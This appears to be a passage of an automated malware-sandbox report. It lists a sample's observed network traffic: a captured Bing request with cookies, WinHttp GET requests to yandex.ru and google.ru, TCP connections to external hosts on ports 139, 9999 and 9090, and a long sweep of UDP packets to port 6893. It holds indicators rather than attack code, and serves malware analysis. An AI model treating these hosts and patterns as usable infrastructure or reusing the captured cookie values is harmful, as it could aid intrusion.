t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 89890Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1664488077680&AC=1&CPH=4ef661f2
        Source: global trafficHTTP traffic detected: GET /1001 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yandex.ruCookie: _yasc=ci6rbjmrlQgO0axLw7w6OWn+wuU8RFP050vqcbO+koLLPW4r; is_gdpr_b=CPe0cBDfjAEYAQ==; is_gdpr=1
        Source: global trafficHTTP traffic detected: GET /d2ea090d-962c-45e9-bd4f-67977169ed52 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
        Source: global trafficHTTP traffic detected: GET /1001 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yandex.ru
        Source: global trafficTCP traffic: 192.168.2.3:49711 -> 93.184.220.29:139
        Source: global trafficTCP traffic: 192.168.2.3:49712 -> 178.79.242.0:139
        Source: global trafficTCP traffic: 192.168.2.3:49713 -> 8.248.141.254:139
        Source: global trafficTCP traffic: 192.168.2.3:49726 -> 200.87.164.69:9999
        Source: global trafficTCP traffic: 192.168.2.3:49731 -> 76.73.17.194:9090
        Source: global trafficTCP traffic: 192.168.2.3:49748 -> 200.119.204.12:9999
        Source: global trafficTCP traffic: 192.168.2.3:49778 -> 190.186.45.170:9999
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.0:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.1:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.2:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.3:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.4:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.5:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.6:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.7:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.8:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.9:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.10:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.11:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.12:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.13:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.14:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.15:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.16:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.17:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.18:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.19:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.20:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.21:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.22:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.23:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.24:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.25:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.26:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.27:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.28:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.29:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.30:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 93.107.12.31:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.0:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.1:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.2:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.3:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.4:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.5:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.6:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.7:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.8:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.9:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.10:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.11:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.12:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.13:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.14:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.15:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.16:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.17:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.18:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.19:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.20:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.21:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.22:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.23:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.24:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.25:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.26:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.27:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.28:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.29:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.30:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 95.1.200.31:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.0:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.1:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.2:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.3:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.5:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.4:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.6:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.7:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.8:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.9:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.10:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.12:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.11:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.13:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.14:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.15:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.16:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.17:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.18:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.19:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.20:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.21:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.22:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.23:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.24:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.25:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.27:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.26:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.28:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.29:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.30:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.31:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.32:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.33:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.34:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.35:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.36:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.37:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.38:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.39:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.40:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.41:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.42:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.43:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.44:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.45:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.46:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.47:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.48:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.49:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.50:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.51:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.52:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.53:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.54:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.55:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.56:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.57:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.58:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.59:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.60:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.61:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.62:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.63:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.64:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.65:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.66:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.67:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.68:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.69:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.70:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.71:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.72:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.73:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.74:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.75:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.76:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.77:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.78:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.79:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.80:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.81:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.82:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.83:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.84:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.85:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.86:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.87:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.88:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.89:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.90:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.91:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.92:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.93:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.94:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.95:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.96:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.97:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.98:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.99:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.100:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.101:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.102:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.103:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.104:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.105:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.106:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.107:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.108:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.109:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.110:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.111:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.112:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.113:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.114:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.115:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.116:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.118:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.119:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.120:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.121:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.117:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.122:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.123:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.124:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.125:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.126:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.127:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.128:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.129:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.130:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.131:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.132:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.133:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.134:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.135:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.136:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.137:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.138:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.139:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.140:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.141:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.142:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.143:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.144:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.145:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.146:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.147:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.148:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.149:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.150:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.151:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.152:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.153:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.154:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.155:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.156:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.157:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.158:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.159:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.160:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.161:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.162:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.163:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.164:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.165:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.166:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.167:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.168:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.169:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.170:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.171:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.172:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.173:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.174:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.175:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.176:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.177:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.178:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.179:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.180:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.181:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.182:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.183:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.185:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.186:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.187:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.188:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.189:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.190:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.191:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.184:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.192:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.193:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.194:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.195:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.196:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.197:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.199:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.198:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.200:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.201:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.202:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.203:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.204:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.205:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.206:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.207:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.208:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.209:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.210:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.211:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.212:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.213:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.214:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.215:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.216:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.217:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.218:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.219:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.220:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.221:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.222:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.223:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.224:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.225:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.226:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.227:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.228:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.229:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.230:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.231:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.232:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.233:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.234:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.235:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.236:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.237:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.238:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.239:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.240:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.241:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.242:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.243:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.244:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.245:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.246:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.247:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.249:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.248:6893
